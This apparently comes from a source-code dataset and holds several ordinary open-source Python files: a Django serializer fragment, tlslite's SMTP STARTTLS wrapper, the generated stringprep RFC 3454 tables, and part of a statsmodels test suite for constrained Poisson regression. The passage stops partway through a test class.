if obj.versions.exists():
self.size = obj.versions.first().size
return self.size
return None
def create(self, validated_data):
source = validated_data.pop('source')
destination = validated_data.pop('destination')
name = validated_data.pop('name')
try:
return self.context['view'].perform_file_action(source, destination, name)
except IntegrityError:
raise exceptions.ValidationError('File already exists with this name.')
except file_exceptions.FileNodeCheckedOutError:
raise exceptions.ValidationError('Cannot move file as it is checked out.')
except file_exceptions.FileNodeIsPrimaryFile:
raise exceptions.ValidationError('Cannot move file as it is the primary file of preprint.')
class Meta:
type_ = 'file_metadata'
| apache-2.0 |
ioef/tlslite-ng | tlslite/integration/smtp_tls.py | 115 | 2985 | # Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
"""TLS Lite + smtplib."""
from smtplib import SMTP
from tlslite.tlsconnection import TLSConnection
from tlslite.integration.clienthelper import ClientHelper
class SMTP_TLS(SMTP):
"""This class extends L{smtplib.SMTP} with TLS support."""
def starttls(self,
username=None, password=None,
certChain=None, privateKey=None,
checker=None,
settings=None):
"""Puts the connection to the SMTP server into TLS mode.
If the server supports TLS, this will encrypt the rest of the SMTP
session.
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
you can do certificate-based server
authentication with one of these argument combinations:
- x509Fingerprint
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication.
The caller should be prepared to handle TLS-specific
exceptions. See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type username: str
@param username: SRP username. Requires the
'password' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.x509certchain.X509CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP arguments.
@type privateKey: L{tlslite.utils.rsakey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP arguments.
@type checker: L{tlslite.checker.Checker}
@param checker: Callable object called after handshaking to
evaluate the connection and raise an Exception if necessary.
@type settings: L{tlslite.handshakesettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
"""
(resp, reply) = self.docmd("STARTTLS")
if resp == 220:
helper = ClientHelper(
username, password,
certChain, privateKey,
checker,
settings)
conn = TLSConnection(self.sock)
helper._handshake(conn)
self.sock = conn
self.file = conn.makefile('rb')
return (resp, reply) | lgpl-2.1 |
houzhenggang/hiwifi-openwrt-HC5661-HC5761 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/root-ralink/usr/lib/python2.7/stringprep.py | 278 | 13522 | # This file is generated by mkstringprep.py. DO NOT EDIT.
"""Library that exposes various tables found in the StringPrep RFC 3454.
There are two kinds of tables: sets, for which a member test is provided,
and mappings, for which a mapping function is provided.
"""
from unicodedata import ucd_3_2_0 as unicodedata
assert unicodedata.unidata_version == '3.2.0'
def in_table_a1(code):
if unicodedata.category(code) != 'Cn': return False
c = ord(code)
if 0xFDD0 <= c < 0xFDF0: return False
return (c & 0xFFFF) not in (0xFFFE, 0xFFFF)
b1_set = set([173, 847, 6150, 6155, 6156, 6157, 8203, 8204, 8205, 8288, 65279] + range(65024,65040))
def in_table_b1(code):
return ord(code) in b1_set
b3_exceptions = {
0xb5:u'\u03bc', 0xdf:u'ss', 0x130:u'i\u0307', 0x149:u'\u02bcn',
0x17f:u's', 0x1f0:u'j\u030c', 0x345:u'\u03b9', 0x37a:u' \u03b9',
0x390:u'\u03b9\u0308\u0301', 0x3b0:u'\u03c5\u0308\u0301', 0x3c2:u'\u03c3', 0x3d0:u'\u03b2',
0x3d1:u'\u03b8', 0x3d2:u'\u03c5', 0x3d3:u'\u03cd', 0x3d4:u'\u03cb',
0x3d5:u'\u03c6', 0x3d6:u'\u03c0', 0x3f0:u'\u03ba', 0x3f1:u'\u03c1',
0x3f2:u'\u03c3', 0x3f5:u'\u03b5', 0x587:u'\u0565\u0582', 0x1e96:u'h\u0331',
0x1e97:u't\u0308', 0x1e98:u'w\u030a', 0x1e99:u'y\u030a', 0x1e9a:u'a\u02be',
0x1e9b:u'\u1e61', 0x1f50:u'\u03c5\u0313', 0x1f52:u'\u03c5\u0313\u0300', 0x1f54:u'\u03c5\u0313\u0301',
0x1f56:u'\u03c5\u0313\u0342', 0x1f80:u'\u1f00\u03b9', 0x1f81:u'\u1f01\u03b9', 0x1f82:u'\u1f02\u03b9',
0x1f83:u'\u1f03\u03b9', 0x1f84:u'\u1f04\u03b9', 0x1f85:u'\u1f05\u03b9', 0x1f86:u'\u1f06\u03b9',
0x1f87:u'\u1f07\u03b9', 0x1f88:u'\u1f00\u03b9', 0x1f89:u'\u1f01\u03b9', 0x1f8a:u'\u1f02\u03b9',
0x1f8b:u'\u1f03\u03b9', 0x1f8c:u'\u1f04\u03b9', 0x1f8d:u'\u1f05\u03b9', 0x1f8e:u'\u1f06\u03b9',
0x1f8f:u'\u1f07\u03b9', 0x1f90:u'\u1f20\u03b9', 0x1f91:u'\u1f21\u03b9', 0x1f92:u'\u1f22\u03b9',
0x1f93:u'\u1f23\u03b9', 0x1f94:u'\u1f24\u03b9', 0x1f95:u'\u1f25\u03b9', 0x1f96:u'\u1f26\u03b9',
0x1f97:u'\u1f27\u03b9', 0x1f98:u'\u1f20\u03b9', 0x1f99:u'\u1f21\u03b9', 0x1f9a:u'\u1f22\u03b9',
0x1f9b:u'\u1f23\u03b9', 0x1f9c:u'\u1f24\u03b9', 0x1f9d:u'\u1f25\u03b9', 0x1f9e:u'\u1f26\u03b9',
0x1f9f:u'\u1f27\u03b9', 0x1fa0:u'\u1f60\u03b9', 0x1fa1:u'\u1f61\u03b9', 0x1fa2:u'\u1f62\u03b9',
0x1fa3:u'\u1f63\u03b9', 0x1fa4:u'\u1f64\u03b9', 0x1fa5:u'\u1f65\u03b9', 0x1fa6:u'\u1f66\u03b9',
0x1fa7:u'\u1f67\u03b9', 0x1fa8:u'\u1f60\u03b9', 0x1fa9:u'\u1f61\u03b9', 0x1faa:u'\u1f62\u03b9',
0x1fab:u'\u1f63\u03b9', 0x1fac:u'\u1f64\u03b9', 0x1fad:u'\u1f65\u03b9', 0x1fae:u'\u1f66\u03b9',
0x1faf:u'\u1f67\u03b9', 0x1fb2:u'\u1f70\u03b9', 0x1fb3:u'\u03b1\u03b9', 0x1fb4:u'\u03ac\u03b9',
0x1fb6:u'\u03b1\u0342', 0x1fb7:u'\u03b1\u0342\u03b9', 0x1fbc:u'\u03b1\u03b9', 0x1fbe:u'\u03b9',
0x1fc2:u'\u1f74\u03b9', 0x1fc3:u'\u03b7\u03b9', 0x1fc4:u'\u03ae\u03b9', 0x1fc6:u'\u03b7\u0342',
0x1fc7:u'\u03b7\u0342\u03b9', 0x1fcc:u'\u03b7\u03b9', 0x1fd2:u'\u03b9\u0308\u0300', 0x1fd3:u'\u03b9\u0308\u0301',
0x1fd6:u'\u03b9\u0342', 0x1fd7:u'\u03b9\u0308\u0342', 0x1fe2:u'\u03c5\u0308\u0300', 0x1fe3:u'\u03c5\u0308\u0301',
0x1fe4:u'\u03c1\u0313', 0x1fe6:u'\u03c5\u0342', 0x1fe7:u'\u03c5\u0308\u0342', 0x1ff2:u'\u1f7c\u03b9',
0x1ff3:u'\u03c9\u03b9', 0x1ff4:u'\u03ce\u03b9', 0x1ff6:u'\u03c9\u0342', 0x1ff7:u'\u03c9\u0342\u03b9',
0x1ffc:u'\u03c9\u03b9', 0x20a8:u'rs', 0x2102:u'c', 0x2103:u'\xb0c',
0x2107:u'\u025b', 0x2109:u'\xb0f', 0x210b:u'h', 0x210c:u'h',
0x210d:u'h', 0x2110:u'i', 0x2111:u'i', 0x2112:u'l',
0x2115:u'n', 0x2116:u'no', 0x2119:u'p', 0x211a:u'q',
0x211b:u'r', 0x211c:u'r', 0x211d:u'r', 0x2120:u'sm',
0x2121:u'tel', 0x2122:u'tm', 0x2124:u'z', 0x2128:u'z',
0x212c:u'b', 0x212d:u'c', 0x2130:u'e', 0x2131:u'f',
0x2133:u'm', 0x213e:u'\u03b3', 0x213f:u'\u03c0', 0x2145:u'd',
0x3371:u'hpa', 0x3373:u'au', 0x3375:u'ov', 0x3380:u'pa',
0x3381:u'na', 0x3382:u'\u03bca', 0x3383:u'ma', 0x3384:u'ka',
0x3385:u'kb', 0x3386:u'mb', 0x3387:u'gb', 0x338a:u'pf',
0x338b:u'nf', 0x338c:u'\u03bcf', 0x3390:u'hz', 0x3391:u'khz',
0x3392:u'mhz', 0x3393:u'ghz', 0x3394:u'thz', 0x33a9:u'pa',
0x33aa:u'kpa', 0x33ab:u'mpa', 0x33ac:u'gpa', 0x33b4:u'pv',
0x33b5:u'nv', 0x33b6:u'\u03bcv', 0x33b7:u'mv', 0x33b8:u'kv',
0x33b9:u'mv', 0x33ba:u'pw', 0x33bb:u'nw', 0x33bc:u'\u03bcw',
0x33bd:u'mw', 0x33be:u'kw', 0x33bf:u'mw', 0x33c0:u'k\u03c9',
0x33c1:u'm\u03c9', 0x33c3:u'bq', 0x33c6:u'c\u2215kg', 0x33c7:u'co.',
0x33c8:u'db', 0x33c9:u'gy', 0x33cb:u'hp', 0x33cd:u'kk',
0x33ce:u'km', 0x33d7:u'ph', 0x33d9:u'ppm', 0x33da:u'pr',
0x33dc:u'sv', 0x33dd:u'wb', 0xfb00:u'ff', 0xfb01:u'fi',
0xfb02:u'fl', 0xfb03:u'ffi', 0xfb04:u'ffl', 0xfb05:u'st',
0xfb06:u'st', 0xfb13:u'\u0574\u0576', 0xfb14:u'\u0574\u0565', 0xfb15:u'\u0574\u056b',
0xfb16:u'\u057e\u0576', 0xfb17:u'\u0574\u056d', 0x1d400:u'a', 0x1d401:u'b',
0x1d402:u'c', 0x1d403:u'd', 0x1d404:u'e', 0x1d405:u'f',
0x1d406:u'g', 0x1d407:u'h', 0x1d408:u'i', 0x1d409:u'j',
0x1d40a:u'k', 0x1d40b:u'l', 0x1d40c:u'm', 0x1d40d:u'n',
0x1d40e:u'o', 0x1d40f:u'p', 0x1d410:u'q', 0x1d411:u'r',
0x1d412:u's', 0x1d413:u't', 0x1d414:u'u', 0x1d415:u'v',
0x1d416:u'w', 0x1d417:u'x', 0x1d418:u'y', 0x1d419:u'z',
0x1d434:u'a', 0x1d435:u'b', 0x1d436:u'c', 0x1d437:u'd',
0x1d438:u'e', 0x1d439:u'f', 0x1d43a:u'g', 0x1d43b:u'h',
0x1d43c:u'i', 0x1d43d:u'j', 0x1d43e:u'k', 0x1d43f:u'l',
0x1d440:u'm', 0x1d441:u'n', 0x1d442:u'o', 0x1d443:u'p',
0x1d444:u'q', 0x1d445:u'r', 0x1d446:u's', 0x1d447:u't',
0x1d448:u'u', 0x1d449:u'v', 0x1d44a:u'w', 0x1d44b:u'x',
0x1d44c:u'y', 0x1d44d:u'z', 0x1d468:u'a', 0x1d469:u'b',
0x1d46a:u'c', 0x1d46b:u'd', 0x1d46c:u'e', 0x1d46d:u'f',
0x1d46e:u'g', 0x1d46f:u'h', 0x1d470:u'i', 0x1d471:u'j',
0x1d472:u'k', 0x1d473:u'l', 0x1d474:u'm', 0x1d475:u'n',
0x1d476:u'o', 0x1d477:u'p', 0x1d478:u'q', 0x1d479:u'r',
0x1d47a:u's', 0x1d47b:u't', 0x1d47c:u'u', 0x1d47d:u'v',
0x1d47e:u'w', 0x1d47f:u'x', 0x1d480:u'y', 0x1d481:u'z',
0x1d49c:u'a', 0x1d49e:u'c', 0x1d49f:u'd', 0x1d4a2:u'g',
0x1d4a5:u'j', 0x1d4a6:u'k', 0x1d4a9:u'n', 0x1d4aa:u'o',
0x1d4ab:u'p', 0x1d4ac:u'q', 0x1d4ae:u's', 0x1d4af:u't',
0x1d4b0:u'u', 0x1d4b1:u'v', 0x1d4b2:u'w', 0x1d4b3:u'x',
0x1d4b4:u'y', 0x1d4b5:u'z', 0x1d4d0:u'a', 0x1d4d1:u'b',
0x1d4d2:u'c', 0x1d4d3:u'd', 0x1d4d4:u'e', 0x1d4d5:u'f',
0x1d4d6:u'g', 0x1d4d7:u'h', 0x1d4d8:u'i', 0x1d4d9:u'j',
0x1d4da:u'k', 0x1d4db:u'l', 0x1d4dc:u'm', 0x1d4dd:u'n',
0x1d4de:u'o', 0x1d4df:u'p', 0x1d4e0:u'q', 0x1d4e1:u'r',
0x1d4e2:u's', 0x1d4e3:u't', 0x1d4e4:u'u', 0x1d4e5:u'v',
0x1d4e6:u'w', 0x1d4e7:u'x', 0x1d4e8:u'y', 0x1d4e9:u'z',
0x1d504:u'a', 0x1d505:u'b', 0x1d507:u'd', 0x1d508:u'e',
0x1d509:u'f', 0x1d50a:u'g', 0x1d50d:u'j', 0x1d50e:u'k',
0x1d50f:u'l', 0x1d510:u'm', 0x1d511:u'n', 0x1d512:u'o',
0x1d513:u'p', 0x1d514:u'q', 0x1d516:u's', 0x1d517:u't',
0x1d518:u'u', 0x1d519:u'v', 0x1d51a:u'w', 0x1d51b:u'x',
0x1d51c:u'y', 0x1d538:u'a', 0x1d539:u'b', 0x1d53b:u'd',
0x1d53c:u'e', 0x1d53d:u'f', 0x1d53e:u'g', 0x1d540:u'i',
0x1d541:u'j', 0x1d542:u'k', 0x1d543:u'l', 0x1d544:u'm',
0x1d546:u'o', 0x1d54a:u's', 0x1d54b:u't', 0x1d54c:u'u',
0x1d54d:u'v', 0x1d54e:u'w', 0x1d54f:u'x', 0x1d550:u'y',
0x1d56c:u'a', 0x1d56d:u'b', 0x1d56e:u'c', 0x1d56f:u'd',
0x1d570:u'e', 0x1d571:u'f', 0x1d572:u'g', 0x1d573:u'h',
0x1d574:u'i', 0x1d575:u'j', 0x1d576:u'k', 0x1d577:u'l',
0x1d578:u'm', 0x1d579:u'n', 0x1d57a:u'o', 0x1d57b:u'p',
0x1d57c:u'q', 0x1d57d:u'r', 0x1d57e:u's', 0x1d57f:u't',
0x1d580:u'u', 0x1d581:u'v', 0x1d582:u'w', 0x1d583:u'x',
0x1d584:u'y', 0x1d585:u'z', 0x1d5a0:u'a', 0x1d5a1:u'b',
0x1d5a2:u'c', 0x1d5a3:u'd', 0x1d5a4:u'e', 0x1d5a5:u'f',
0x1d5a6:u'g', 0x1d5a7:u'h', 0x1d5a8:u'i', 0x1d5a9:u'j',
0x1d5aa:u'k', 0x1d5ab:u'l', 0x1d5ac:u'm', 0x1d5ad:u'n',
0x1d5ae:u'o', 0x1d5af:u'p', 0x1d5b0:u'q', 0x1d5b1:u'r',
0x1d5b2:u's', 0x1d5b3:u't', 0x1d5b4:u'u', 0x1d5b5:u'v',
0x1d5b6:u'w', 0x1d5b7:u'x', 0x1d5b8:u'y', 0x1d5b9:u'z',
0x1d5d4:u'a', 0x1d5d5:u'b', 0x1d5d6:u'c', 0x1d5d7:u'd',
0x1d5d8:u'e', 0x1d5d9:u'f', 0x1d5da:u'g', 0x1d5db:u'h',
0x1d5dc:u'i', 0x1d5dd:u'j', 0x1d5de:u'k', 0x1d5df:u'l',
0x1d5e0:u'm', 0x1d5e1:u'n', 0x1d5e2:u'o', 0x1d5e3:u'p',
0x1d5e4:u'q', 0x1d5e5:u'r', 0x1d5e6:u's', 0x1d5e7:u't',
0x1d5e8:u'u', 0x1d5e9:u'v', 0x1d5ea:u'w', 0x1d5eb:u'x',
0x1d5ec:u'y', 0x1d5ed:u'z', 0x1d608:u'a', 0x1d609:u'b',
0x1d60a:u'c', 0x1d60b:u'd', 0x1d60c:u'e', 0x1d60d:u'f',
0x1d60e:u'g', 0x1d60f:u'h', 0x1d610:u'i', 0x1d611:u'j',
0x1d612:u'k', 0x1d613:u'l', 0x1d614:u'm', 0x1d615:u'n',
0x1d616:u'o', 0x1d617:u'p', 0x1d618:u'q', 0x1d619:u'r',
0x1d61a:u's', 0x1d61b:u't', 0x1d61c:u'u', 0x1d61d:u'v',
0x1d61e:u'w', 0x1d61f:u'x', 0x1d620:u'y', 0x1d621:u'z',
0x1d63c:u'a', 0x1d63d:u'b', 0x1d63e:u'c', 0x1d63f:u'd',
0x1d640:u'e', 0x1d641:u'f', 0x1d642:u'g', 0x1d643:u'h',
0x1d644:u'i', 0x1d645:u'j', 0x1d646:u'k', 0x1d647:u'l',
0x1d648:u'm', 0x1d649:u'n', 0x1d64a:u'o', 0x1d64b:u'p',
0x1d64c:u'q', 0x1d64d:u'r', 0x1d64e:u's', 0x1d64f:u't',
0x1d650:u'u', 0x1d651:u'v', 0x1d652:u'w', 0x1d653:u'x',
0x1d654:u'y', 0x1d655:u'z', 0x1d670:u'a', 0x1d671:u'b',
0x1d672:u'c', 0x1d673:u'd', 0x1d674:u'e', 0x1d675:u'f',
0x1d676:u'g', 0x1d677:u'h', 0x1d678:u'i', 0x1d679:u'j',
0x1d67a:u'k', 0x1d67b:u'l', 0x1d67c:u'm', 0x1d67d:u'n',
0x1d67e:u'o', 0x1d67f:u'p', 0x1d680:u'q', 0x1d681:u'r',
0x1d682:u's', 0x1d683:u't', 0x1d684:u'u', 0x1d685:u'v',
0x1d686:u'w', 0x1d687:u'x', 0x1d688:u'y', 0x1d689:u'z',
0x1d6a8:u'\u03b1', 0x1d6a9:u'\u03b2', 0x1d6aa:u'\u03b3', 0x1d6ab:u'\u03b4',
0x1d6ac:u'\u03b5', 0x1d6ad:u'\u03b6', 0x1d6ae:u'\u03b7', 0x1d6af:u'\u03b8',
0x1d6b0:u'\u03b9', 0x1d6b1:u'\u03ba', 0x1d6b2:u'\u03bb', 0x1d6b3:u'\u03bc',
0x1d6b4:u'\u03bd', 0x1d6b5:u'\u03be', 0x1d6b6:u'\u03bf', 0x1d6b7:u'\u03c0',
0x1d6b8:u'\u03c1', 0x1d6b9:u'\u03b8', 0x1d6ba:u'\u03c3', 0x1d6bb:u'\u03c4',
0x1d6bc:u'\u03c5', 0x1d6bd:u'\u03c6', 0x1d6be:u'\u03c7', 0x1d6bf:u'\u03c8',
0x1d6c0:u'\u03c9', 0x1d6d3:u'\u03c3', 0x1d6e2:u'\u03b1', 0x1d6e3:u'\u03b2',
0x1d6e4:u'\u03b3', 0x1d6e5:u'\u03b4', 0x1d6e6:u'\u03b5', 0x1d6e7:u'\u03b6',
0x1d6e8:u'\u03b7', 0x1d6e9:u'\u03b8', 0x1d6ea:u'\u03b9', 0x1d6eb:u'\u03ba',
0x1d6ec:u'\u03bb', 0x1d6ed:u'\u03bc', 0x1d6ee:u'\u03bd', 0x1d6ef:u'\u03be',
0x1d6f0:u'\u03bf', 0x1d6f1:u'\u03c0', 0x1d6f2:u'\u03c1', 0x1d6f3:u'\u03b8',
0x1d6f4:u'\u03c3', 0x1d6f5:u'\u03c4', 0x1d6f6:u'\u03c5', 0x1d6f7:u'\u03c6',
0x1d6f8:u'\u03c7', 0x1d6f9:u'\u03c8', 0x1d6fa:u'\u03c9', 0x1d70d:u'\u03c3',
0x1d71c:u'\u03b1', 0x1d71d:u'\u03b2', 0x1d71e:u'\u03b3', 0x1d71f:u'\u03b4',
0x1d720:u'\u03b5', 0x1d721:u'\u03b6', 0x1d722:u'\u03b7', 0x1d723:u'\u03b8',
0x1d724:u'\u03b9', 0x1d725:u'\u03ba', 0x1d726:u'\u03bb', 0x1d727:u'\u03bc',
0x1d728:u'\u03bd', 0x1d729:u'\u03be', 0x1d72a:u'\u03bf', 0x1d72b:u'\u03c0',
0x1d72c:u'\u03c1', 0x1d72d:u'\u03b8', 0x1d72e:u'\u03c3', 0x1d72f:u'\u03c4',
0x1d730:u'\u03c5', 0x1d731:u'\u03c6', 0x1d732:u'\u03c7', 0x1d733:u'\u03c8',
0x1d734:u'\u03c9', 0x1d747:u'\u03c3', 0x1d756:u'\u03b1', 0x1d757:u'\u03b2',
0x1d758:u'\u03b3', 0x1d759:u'\u03b4', 0x1d75a:u'\u03b5', 0x1d75b:u'\u03b6',
0x1d75c:u'\u03b7', 0x1d75d:u'\u03b8', 0x1d75e:u'\u03b9', 0x1d75f:u'\u03ba',
0x1d760:u'\u03bb', 0x1d761:u'\u03bc', 0x1d762:u'\u03bd', 0x1d763:u'\u03be',
0x1d764:u'\u03bf', 0x1d765:u'\u03c0', 0x1d766:u'\u03c1', 0x1d767:u'\u03b8',
0x1d768:u'\u03c3', 0x1d769:u'\u03c4', 0x1d76a:u'\u03c5', 0x1d76b:u'\u03c6',
0x1d76c:u'\u03c7', 0x1d76d:u'\u03c8', 0x1d76e:u'\u03c9', 0x1d781:u'\u03c3',
0x1d790:u'\u03b1', 0x1d791:u'\u03b2', 0x1d792:u'\u03b3', 0x1d793:u'\u03b4',
0x1d794:u'\u03b5', 0x1d795:u'\u03b6', 0x1d796:u'\u03b7', 0x1d797:u'\u03b8',
0x1d798:u'\u03b9', 0x1d799:u'\u03ba', 0x1d79a:u'\u03bb', 0x1d79b:u'\u03bc',
0x1d79c:u'\u03bd', 0x1d79d:u'\u03be', 0x1d79e:u'\u03bf', 0x1d79f:u'\u03c0',
0x1d7a0:u'\u03c1', 0x1d7a1:u'\u03b8', 0x1d7a2:u'\u03c3', 0x1d7a3:u'\u03c4',
0x1d7a4:u'\u03c5', 0x1d7a5:u'\u03c6', 0x1d7a6:u'\u03c7', 0x1d7a7:u'\u03c8',
0x1d7a8:u'\u03c9', 0x1d7bb:u'\u03c3', }
def map_table_b3(code):
r = b3_exceptions.get(ord(code))
if r is not None: return r
return code.lower()
def map_table_b2(a):
al = map_table_b3(a)
b = unicodedata.normalize("NFKC", al)
bl = u"".join([map_table_b3(ch) for ch in b])
c = unicodedata.normalize("NFKC", bl)
if b != c:
return c
else:
return al
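# Worked examples of the B.2 mapping (casefold via map_table_b3, then
# NFKC, re-folding only when normalization changed the string):
#
#   >>> map_table_b2(u'\xdf')    # LATIN SMALL LETTER SHARP S
#   u'ss'
#   >>> map_table_b2(u'\u2126')  # OHM SIGN lowercases to small omega
#   u'\u03c9'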
def in_table_c11(code):
return code == u" "
def in_table_c12(code):
return unicodedata.category(code) == "Zs" and code != u" "
def in_table_c11_c12(code):
return unicodedata.category(code) == "Zs"
def in_table_c21(code):
return ord(code) < 128 and unicodedata.category(code) == "Cc"
c22_specials = set([1757, 1807, 6158, 8204, 8205, 8232, 8233, 65279] + range(8288,8292) + range(8298,8304) + range(65529,65533) + range(119155,119163))
def in_table_c22(code):
c = ord(code)
if c < 128: return False
if unicodedata.category(code) == "Cc": return True
return c in c22_specials
def in_table_c21_c22(code):
return unicodedata.category(code) == "Cc" or \
ord(code) in c22_specials
def in_table_c3(code):
return unicodedata.category(code) == "Co"
def in_table_c4(code):
c = ord(code)
if c < 0xFDD0: return False
if c < 0xFDF0: return True
return (ord(code) & 0xFFFF) in (0xFFFE, 0xFFFF)
def in_table_c5(code):
return unicodedata.category(code) == "Cs"
c6_set = set(range(65529,65534))
def in_table_c6(code):
return ord(code) in c6_set
c7_set = set(range(12272,12284))
def in_table_c7(code):
return ord(code) in c7_set
c8_set = set([832, 833, 8206, 8207] + range(8234,8239) + range(8298,8304))
def in_table_c8(code):
return ord(code) in c8_set
c9_set = set([917505] + range(917536,917632))
def in_table_c9(code):
return ord(code) in c9_set
def in_table_d1(code):
return unicodedata.bidirectional(code) in ("R","AL")
def in_table_d2(code):
return unicodedata.bidirectional(code) == "L"
| gpl-2.0 |
wkfwkf/statsmodels | statsmodels/discrete/tests/test_constrained.py | 26 | 19635 | # -*- coding: utf-8 -*-
"""
Created on Fri May 30 16:22:29 2014
Author: Josef Perktold
License: BSD-3
"""
from statsmodels.compat.python import StringIO
import numpy as np
from numpy.testing import assert_allclose, assert_equal, assert_
from nose import SkipTest
import pandas as pd
import patsy
from statsmodels.discrete.discrete_model import Poisson
from statsmodels.discrete.discrete_model import Logit
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.genmod import families
from statsmodels.base._constraints import fit_constrained
from statsmodels.tools.tools import add_constant
from statsmodels import datasets
spector_data = datasets.spector.load()
spector_data.exog = add_constant(spector_data.exog, prepend=False)
from .results import results_poisson_constrained as results
from .results import results_glm_logit_constrained as reslogit
DEBUG = False
ss='''\
agecat smokes deaths pyears
1 1 32 52407
2 1 104 43248
3 1 206 28612
4 1 186 12663
5 1 102 5317
1 0 2 18790
2 0 12 10673
3 0 28 5710
4 0 28 2585
5 0 31 1462'''
data = pd.read_csv(StringIO(ss), delimiter='\t')
data['logpyears'] = np.log(data['pyears'])
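# All tests below share one workflow: build a patsy linear constraint from
# the model's exog names, then fit subject to it. A minimal sketch, using
# an illustrative formula/constraint (indexing matches the tests: res[0]
# holds the params, res[1] the covariance):
#
#   mod = Poisson.from_formula('deaths ~ smokes + C(agecat)', data=data)
#   lc = patsy.DesignInfo(mod.exog_names).linear_constraint(
#       'C(agecat)[T.4] = C(agecat)[T.5]')
#   res = fit_constrained(mod, lc.coefs, lc.constants,
#                         fit_kwds={'method': 'newton', 'disp': 0})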
class CheckPoissonConstrainedMixin(object):
def test_basic(self):
res1 = self.res1
res2 = self.res2
assert_allclose(res1[0], res2.params[self.idx], rtol=1e-6)
# see below: Stata has nan, we have zero
bse1 = np.sqrt(np.diag(res1[1]))
mask = (bse1 == 0) & np.isnan(res2.bse[self.idx])
assert_allclose(bse1[~mask], res2.bse[self.idx][~mask], rtol=1e-6)
def test_basic_method(self):
if hasattr(self, 'res1m'):
res1 = (self.res1m if not hasattr(self.res1m, '_results')
else self.res1m._results)
res2 = self.res2
assert_allclose(res1.params, res2.params[self.idx], rtol=1e-6)
# when a parameter is fixed, Stata has bse=nan, we have bse=0
mask = (res1.bse == 0) & np.isnan(res2.bse[self.idx])
assert_allclose(res1.bse[~mask], res2.bse[self.idx][~mask], rtol=1e-6)
tvalues = res2.params_table[self.idx, 2]
# when a parameter is fixed, the Stata has tvalue=nan, we have tvalue=inf
mask = np.isinf(res1.tvalues) & np.isnan(tvalues)
assert_allclose(res1.tvalues[~mask], tvalues[~mask], rtol=1e-6)
pvalues = res2.params_table[self.idx, 3]
# note most pvalues are very small
# examples so far agree at 8 or more decimal, but rtol is stricter
# see above
mask = (res1.pvalues == 0) & np.isnan(pvalues)
assert_allclose(res1.pvalues[~mask], pvalues[~mask], rtol=5e-5)
ci_low = res2.params_table[self.idx, 4]
ci_upp = res2.params_table[self.idx, 5]
ci = np.column_stack((ci_low, ci_upp))
# note most pvalues are very small
# examples so far agree at 8 or more decimal, but rtol is stricter
# see above: nan versus value
assert_allclose(res1.conf_int()[~np.isnan(ci)], ci[~np.isnan(ci)], rtol=5e-5)
#other
assert_allclose(res1.llf, res2.ll, rtol=1e-6)
assert_equal(res1.df_model, res2.df_m)
# Stata doesn't have df_resid
df_r = res2.N - res2.df_m - 1
assert_equal(res1.df_resid, df_r)
else:
raise SkipTest("not available yet")
def test_other(self):
# some results may not be valid or available for all models
if hasattr(self, 'res1m'):
res1 = self.res1m
res2 = self.res2
if hasattr(res2, 'll_0'):
assert_allclose(res1.llnull, res2.ll_0, rtol=1e-6)
else:
if DEBUG:
import warnings
message = ('test: ll_0 not available, llnull=%6.4F'
% res1.llnull)
warnings.warn(message)
else:
raise SkipTest("not available yet")
class TestPoissonConstrained1a(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_noexposure_constraint
cls.idx = [7, 3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ logpyears + smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data)
#res1a = mod1a.fit()
# get start_params; the example fails to converge on one Python version on TravisCI
k_vars = len(mod.exog_names)
start_params = np.zeros(k_vars)
start_params[0] = np.log(mod.endog.mean())
# if we need them, these are the desired params
p = np.array([-3.93478643, 1.37276214, 2.33077032, 2.71338891,
2.71338891, 0.57966535, 0.97254074])
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
start_params=start_params,
fit_kwds={'method': 'bfgs',
'disp': 0})
# TODO: Newton fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, start_params=start_params,
method='bfgs', disp=0)
def test_smoke(self):
# trailing text in summary, assumes it's the first extra string
#NOTE: see comment about convergence in llnull for self.res1m
summ = self.res1m.summary()
assert_('linear equality constraints' in summ.extra_txt)
summ = self.res1m.summary2()
assert_('linear equality constraints' in summ.extra_txt[0])
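# --- Informal sketch (ours) of the constraint machinery used above ---
# patsy turns the textual constraint into an (R, q) pair satisfying
# R.dot(params) == q; for example (assuming the patsy API as used in
# this file):
#     lc = patsy.DesignInfo(['a', 'b', 'c']).linear_constraint('b = c')
#     lc.coefs      # array([[ 0.,  1., -1.]])
#     lc.constants  # array([[ 0.]])
# fit_constrained then maximizes the likelihood subject to R params = q.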
class TestPoissonConstrained1b(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
exposure=data['pyears'].values)
#offset=np.log(data['pyears'].values))
#res1a = mod1a.fit()
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method': 'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, method='newton',
disp=0)
class TestPoissonConstrained1c(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint
